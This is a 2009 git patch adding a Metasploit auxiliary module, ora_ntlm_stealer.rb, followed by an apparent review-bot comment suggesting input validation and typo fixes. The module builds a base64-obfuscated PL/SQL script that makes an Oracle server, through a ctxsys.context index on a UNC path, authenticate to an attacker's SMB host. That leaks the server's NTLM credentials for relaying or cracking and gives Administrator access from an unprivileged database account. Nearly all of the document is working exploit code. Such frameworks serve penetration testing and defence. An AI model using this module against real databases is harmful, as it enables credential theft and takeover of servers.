From c8d0197a8661e955cfb3ea49bf208a197f405f95 Mon Sep 17 00:00:00 2001
From: Mario Ceballos
Date: Tue, 7 Apr 2009 21:53:08 +0000
Subject: [PATCH] added auxiliary module ora_ntlm_stealer.rb from Sh2kerr
git-svn-id: file:///home/svn/framework3/trunk@6464 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../admin/oracle/ora_ntlm_stealer.rb | 80 +++++++++++++++++++
 1 file changed, 80 insertions(+)
 create mode 100644 modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
new file mode 100644
index 0000000000..8bc02cdcd2
--- /dev/null
+++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb
@@ -0,0 +1,80 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Owning Windows server using Oracle database unpivileged user',
+ 'Description' => %q{
+ This module will help you to get Administrator access to OS using unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges)
+ To do this you must firstly run smb_sniffer of smb_relay module on your sever. Then you must connect to
+ Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS.
+ So if smb_relay is working you will get Administrators access to server which runs Oracle of not than you can decrypt HALFLM hash.
+ },
+ 'Author' => [ 'Sh2kerr ' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+
+ [ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
+
+ ],
+ 'DisclosureDate' => 'April 7 2009'))
+
+ register_options(
+ [
+ OptString.new('IP', [ false, 'IP adress of SMB proxy.', '0.0.0.0']),
+ OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
+ OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),
+
+ ], self.class)
+ end
+
+ def run
+ name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+
+ prepare = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
+ prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
+
+ exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
+
+ prp = Rex::Text.encode_base64(prepare)
+ prp1 = Rex::Text.encode_base64(prepare1)
+ exp1 = Rex::Text.encode_base64(exploiting1)
+
+ sql = %Q|
+ DECLARE
+ #{rand1} VARCHAR2(32767);
+ #{rand2} VARCHAR2(32767);
+ #{rand3} VARCHAR2(32767);
+ BEGIN
+ #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
+ EXECUTE IMMEDIATE #{rand1};
+ #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
+ EXECUTE IMMEDIATE #{rand2};
+ #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
+ EXECUTE IMMEDIATE #{rand3};
+ END;
+ /
+ |
+
+ print_status("Creating '#{datastore['FILENAME']}' file ...")
+ file_create(sql)
+
+ end
+
+end
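Review bot: The `IP` option in register_options is declared optional with a default of '0.0.0.0' and is then interpolated unvalidated into the INSERT statement in run, so leaving it unset silently writes a UNC path to 0.0.0.0 into the generated file, and a value containing a quote yields broken SQL. Declaring it as a required address option lets the framework validate it before run is reached: `OptAddress.new('IP', [ true, 'IP address of the SMB proxy.' ]),`. The Name, Description and option strings also carry several typos ("unpivileged", "sever", "adress", "of not than") that are worth cleaning up in the same commit, and the Description should state that the output is a SQL script to be fed to the target database rather than something the module runs itself, since run only calls file_create.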